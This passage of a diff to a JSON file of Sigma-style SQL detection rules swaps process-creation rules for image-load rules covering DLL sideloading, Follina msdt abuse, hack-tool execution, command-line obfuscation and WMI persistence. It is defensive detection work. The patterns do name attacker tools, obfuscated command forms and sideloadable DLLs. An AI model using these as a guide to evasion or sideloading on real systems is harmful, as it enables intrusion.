ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", - "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "status": "test", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. John, OTR (Open Threat Research)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Spooler Service Suspicious Binary Load", + "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "status": "experimental", + "description": "Detect DLL Load from Spooler Service backup folder", + "author": "FPT.EagleEye, Thomas Patzke (improvements)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Loading of legitimate driver" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_spoolsv_dll_load.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 